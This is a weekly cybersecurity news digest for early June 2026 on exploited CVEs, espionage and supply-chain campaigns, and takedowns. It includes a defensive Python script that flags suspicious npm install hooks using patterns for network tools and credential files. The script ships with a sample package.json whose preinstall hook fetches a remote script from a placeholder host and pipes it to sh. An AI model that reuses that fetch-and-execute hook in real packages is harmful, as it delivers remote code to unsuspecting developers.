Cyber Security Week in Review: June 5, 2026

Belgium’s national cybersecurity authority (The Centre for Cybersecurity Belgium, CCB) has warned that cybercriminals are actively exploiting a recently patched Windows Netlogon vulnerability. The flaw, tracked as CVE-2026-41089, was fixed by Microsoft during its May 2026 Patch Tuesday release. It affects all supported versions of Windows Server, including Windows Server 2025.

A remote denial-of-service vulnerability has been discovered that affects major web servers, including NGINX, Apache HTTPD, Microsoft IIS, and Envoy. Dubbed “HTTP/2 Bomb,” the flaw can be exploited over HTTP/2 to overwhelm servers and cause service disruption.

NGINX users are advised to upgrade to version 1.29.8 or later, which introduces protective limits, or disable HTTP/2 if upgrading is not possible. For Apache HTTPD, the issue is fixed in mod_http2 v2.0.41, with HTTP/2 disablement via configuration as a fallback. At the time of writing, Microsoft IIS, Envoy, and Cloudflare Pingora have yet to receive patches.

CISA has updated its Known Exploited Vulnerabilities (KEV) catalog to include several flaws that are being actively exploited in the wild. One of the issues is CVE-2024-21182 in Oracle WebLogic Server, an improper input validation flaw in the Core component that can allow a remote unauthenticated attacker to access sensitive information. Proof-of-concept exploits for this vulnerability are already publicly available.

Another is CVE-2026-0257 affecting Palo Alto Networks’ GlobalProtect portal, which involves a security restrictions bypass that could be abused to gain unauthorized VPN access. The agency also flagged CVE-2025-48595 in the Android Framework, an integer overflow vulnerability that can enable a local application to escalate privileges on a device.

In addition, CVE-2022-0492 in the Linux kernel (the cgroups v1 release_agent feature) can lead to privilege escalation. The list also includes CVE-2026-45247, a deserialization of untrusted data issue affecting Mirasvit Cache Warmer, a popular Magento full-page cache extension.

Threat actors are actively exploiting a recently patched security flaw in Palo Alto Networks’ PAN-OS GlobalProtect software to target corporate networks. The now-fixed vulnerability, tracked as CVE-2026-0257, allows attackers to bypass authentication and establish unauthorized VPN connections on affected devices. Palo Alto Networks said that it “has become aware of limited exploit attempts on unpatched PAN-OS devices without mitigations applied.”

Acer is working on fixes for two high-severity vulnerabilities affecting Wave 7 mesh routers running firmware version T7c_GBL_1.01.000055 or earlier. The first flaw, tracked as CVE-2026-49200, is a broken access control vulnerability that could allow unauthenticated remote attackers to access plaintext credentials stored in router log archives. The second issue (CVE-2026-49201) involves a hardcoded cryptographic key that could enable remote, unauthenticated attackers to gain persistent backdoor access to affected devices. Acer said that a firmware update addressing both vulnerabilities is scheduled for release by the end of June 2026.

The Russian state-backed cyberespionage group Gamaredon has launched a new campaign against Ukrainian government, military, and critical infrastructure organizations, deploying a VBScript-based worm that hides within native Windows features and uses cloud services for command-and-control (C&C) communications. The campaign begins with weaponized xHTML files that deliver a malicious RAR archive exploiting a WinRAR RCE vulnerability (CVE-2025-8088). The second and third parts of Sekoia’s report on Gamaredon can be found here and here.

A threat group known as GreyVibe has been targeting Ukrainian and Ukraine-related organizations using AI-generated lures and custom malware tools. The campaign, active since at least August 2025, has targeted military, government, civilian, and business sectors through phishing emails, fake websites, and deceptive online services.

A new cyber espionage campaign, dubbed “Operation Dragon Weave,” is targeting government officials and citizens in the Czech Republic and Taiwan. The campaign mainly targets organizations in government, research, education, technology, and financial services. Attackers send spear-phishing emails containing ZIP file attachments. The attack chains eventually install a Rust-based malware loader known as RUSTCLOAK, which then deploys a remote access tool called AZUREVEIL.

A Chinese-speaking cybercrime group, tracked as TA4922, has expanded its operations into Europe, targeting organizations in Germany, Italy, the United Kingdom, and South Africa with new malware and the Atlas remote access trojan (RAT). Proofpoint researchers say that TA4922 now conducts more unique campaigns than any other cybercrime actor they track. The threat actor uses localized phishing emails disguised as payroll notices, tax audits, VAT filings, invoices, and government compliance requests to infect victim systems with the Atlas RAT backdoor.

The Five Eyes intelligence alliance warned that Chinese spies are using online job sites to recruit people with access to sensitive information. Intelligence officers allegedly pose as recruiters or consultants to target government workers, military personnel, and others who may have access to classified data, including academics, journalists, and think tank staff.

LevelBlue discovered a sophisticated macOS campaign orchestrated by a North Korean threat group tracked as Sapphire Sleet and BlueNoroff/UNC1069, targeting venture capital firms, Web3 developers, and cryptocurrency organizations. Attackers impersonate recruiters, investors, or business partners to convince victims to install a fake Zoom update before a video meeting. The malicious script collects and exfiltrates sensitive data, including crypto wallets, browser extension data, Telegram sessions, SSH keys, and unencrypted Apple Notes.

Another North Korean threat group known as Famous Chollima has been observed targeting PHP developers through a compromised package published on Packagist. The malware loader is concealed within both the Packagist-hosted package and an associated GitHub branch, enabling it to retrieve and execute remote code. Researchers believe the campaign may be linked to a Contagious Interview-style social engineering operation designed to infect developer environments.

The third North Korean actor, tracked as Kimsuky (aka Velvet Chollima), has been linked to a wave of attacks targeting South Korean military and corporate entities through March and April 2026. The campaign utilized a variety of techniques, including the JSONPing method and a new HttpSpy variant, which now uses a three-stage execution chain (Installer - Loader - HttpSpy).

The latest Sonatype research looks into a Lazarus Group npm campaign using dozens of malicious packages to abuse developer trust and deliver follow-on payloads. The threat actor leverages tactics like suffix-addition, embedding and version mimicry.

Symantec has detailed a five-month espionage campaign that targeted the email account of an unnamed senior executive at a major global stock exchange. Unknown attackers stole emails from the executive’s Outlook mailbox in small batches and used Dropbox and OneDrive Personal to hide the data theft within normal-looking internet traffic.

Iran’s Ministry of Intelligence (MOIS) has likely expanded its “Handala” brand beyond cyber activities to include influence campaigns and physical operations targeting US and Israeli interests. Researchers observed links between the Handala Hack Team, a new group called the “Handala Popular Resistance Front” (HPRF), and several influence-operation networks. Based on their coordinated online activity and shared content, the groups are believed to be connected to MOIS, although with varying levels of confidence.

The US Treasury's Office of Foreign Assets Control (OFAC) has imposed sanctions on Iran’s largest cryptocurrency exchange Nobitex for allegedly facilitating transactions linked to terrorism and helping users evade international economic sanctions. US authorities claim the exchange processed transactions connected to the Islamic Revolutionary Guard Corps (IRGC), including wallets associated with ransomware actors linked to the group.

Cybersecurity researchers at Sophos have uncovered a ransomware-related framework that uses artificial intelligence to speed up malware development and testing. The toolkit automates Active Directory (AD) discovery and includes features designed to evade endpoint detection and response (EDR) products.

JFrog researchers found malware called IronWorm, a powerful Rust-based infostealer that steals developer secrets, hides using a kernel-level rootkit, and communicates through Tor. Like the Shai-Hulud worm, it spreads by abusing stolen credentials to insert itself into GitHub repositories and publish malicious packages on NPM, turning trusted developer tools into a self-replicating supply-chain attack. It mainly targets software and crypto/Web3 developers.

Speaking of Shai-Hulud, multiple security firms observed a malicious npm supply-chain campaign affecting several Red Hat Cloud Services packages. The attack, described as a “mini Shai-Hulud” campaign, is designed to steal developer credentials and CI/CD secrets during package installation.
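Both the IronWorm and the “mini Shai-Hulud” items above describe npm packages that steal credentials and CI/CD secrets at install time, which means the payload is wired into the package’s lifecycle hooks (preinstall, install, postinstall). A cheap defensive check is to audit those hooks before a dependency tree is installed. The script below is an added example written for this review; it is not code from JFrog, Sonatype, Red Hat, or any of the reports cited, and its heuristics (network fetches, inline code execution, shell pipes, credential-file references in a hook command) are assumptions about what install-time theft tends to look like, not indicators published for these campaigns. The two package.json documents are constructed samples with a placeholder domain.

```python
import json
import re
from pathlib import Path

# npm lifecycle hooks that run automatically during installation.
# "prepare" only runs for local and git installs, but is included because it
# executes without any explicit action by the developer.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Assumed heuristics for install-time credential theft (regex, reason).
SUSPICIOUS = [
    (r"\bcurl\b|\bwget\b|\bInvoke-WebRequest\b", "downloads content from the network"),
    (r"\bnode\s+-e\b|\beval\(|new Function\(", "executes inline or dynamic code"),
    (r"base64|\batob\(|Buffer\.from\(", "decodes an encoded payload"),
    (r"\.npmrc|NPM_TOKEN|GITHUB_TOKEN|AWS_SECRET|\.ssh\b|\.git-credentials",
     "references credential files or secret variables"),
    (r"\|\s*(sh|bash)\b|\bsh\s+-c\b|\bbash\b|powershell", "pipes to or spawns a shell"),
]


def audit_package_json(text):
    """Return one finding per install hook found in a package.json document.

    Each finding is a dict with the hook name, the command, a severity of
    "high" (a heuristic matched) or "review" (hook present, nothing matched),
    and the list of matched reasons. Packages with no install hooks return [].
    """
    pkg = json.loads(text)
    scripts = pkg.get("scripts") or {}
    findings = []
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        reasons = [reason for pattern, reason in SUSPICIOUS
                   if re.search(pattern, cmd, re.IGNORECASE)]
        findings.append({
            "hook": hook,
            "command": cmd,
            "severity": "high" if reasons else "review",
            "reasons": reasons,
        })
    return findings


def audit_node_modules(root):
    """Walk an installed tree (e.g. node_modules) and map each package.json
    path that declares install hooks to its findings."""
    results = {}
    for manifest in Path(root).rglob("package.json"):
        try:
            findings = audit_package_json(manifest.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue  # unreadable or not valid JSON; skip rather than crash the audit
        if findings:
            results[str(manifest)] = findings
    return results


# Constructed sample: a package whose hooks fetch and run remote code at install
# time, then execute a bundled script. The domain is a placeholder.
SAMPLE_MALICIOUS = """{
  "name": "example-cloud-helper",
  "version": "1.2.4",
  "scripts": {
    "preinstall": "curl -s https://example.invalid/setup.sh | sh",
    "postinstall": "node setup_bundle.js",
    "test": "jest"
  }
}"""

# Constructed sample: ordinary package with no install hooks at all.
SAMPLE_BENIGN = """{
  "name": "example-string-util",
  "version": "1.0.0",
  "scripts": {"test": "node test.js", "build": "tsc"}
}"""


if __name__ == "__main__":
    for label, doc in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        print(f"== {label} sample ==")
        for f in audit_package_json(doc) or [{"hook": "-", "severity": "none", "command": "", "reasons": []}]:
            print(f"  [{f['severity']}] {f['hook']}: {f['command']}  {f['reasons']}")
```

The "review" severity is deliberate: a postinstall that merely runs a bundled JavaScript file matches none of the heuristics, yet that is exactly how a worm-style payload is usually launched, so every install hook deserves a look and the heuristics only prioritise. Running `npm install --ignore-scripts` in CI, then auditing with `audit_node_modules("node_modules")` before re-enabling scripts for the packages that genuinely need them, turns this into a gate rather than an after-the-fact report.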

Check Point Research found a large campaign that created fake websites imitating popular open-source tools like Ghidra, dnSpy, and SpiderFoot to attract search traffic. The sites looked legitimate and used ad and monetization systems, but some users were redirected through chains that led to malware. The infrastructure delivered several threats, including information stealers and clippers like RemusStealer and AnimateClipper, as well as unwanted applications.

A new phishing scam is targeting Chrome extension developers with fake copyright removal warnings. The message looks real and even shows the extension’s actual name and icon after entering its ID. However, it’s a trick to steal Google login details. If successful, attackers can take over the developer’s account and potentially push harmful updates to users.

A large-scale malware campaign called WeedHack has infected more than 116,000 computers since January by targeting Minecraft players. The malware spreads through fake Minecraft mods, cheats, clients, and other tools. The programs are promoted through YouTube videos and fake websites that appear in search results. The malware is designed to steal sensitive information, including passwords, browser cookies, cryptocurrency wallet data, and login details for platforms such as Discord, Steam, and Telegram. It can also take screenshots of infected devices.

US agencies are warning that hackers are targeting exposed automatic tank gauge (ATG) systems used to monitor fuel and liquid storage tanks. The systems, used in sectors like energy, food, chemicals, and transport, are being attacked through security flaws such as weak or hardcoded passwords, software vulnerabilities, and command execution bugs. Attackers can gain access and change system settings remotely.

Dutch authorities have dismantled a botnet consisting of at least 17 million infected devices and seized more than 200 servers used to support the network, cutting off communication between the controllers and the infected devices.

Spanish and German authorities have dismantled the CrimeNetwork dark web marketplace, one of the largest platforms offering illegal goods and services under the “Crime-as-a-Service” model. The platform's administrator was arrested in Spain and four additional suspects were apprehended in Germany. Authorities conducted two searches in Mallorca and three in Germany and seized the platform's server, which had more than 100,000 users.

In a separate operation, Spanish and French authorities have taken down an online marketplace that offered counterfeit identity documents to migrant smuggling networks across the European Union. Police arrested a suspect in Alicante, Spain, and seized document-production equipment along with around 800 fake European identity documents from an apartment rented under a false identity. The investigation began when French authorities discovered a website advertising counterfeit documents and traced its operator to Alicante, where he had been living since 2024.

A major international operation coordinated by Bulgaria and Europol targeted criminal networks profiting from illegal streaming of sports, films, and TV channels. Over seven months, authorities arrested 29 people, dismantled nine organized crime groups, and removed more than 27,000 illegal streaming URLs.
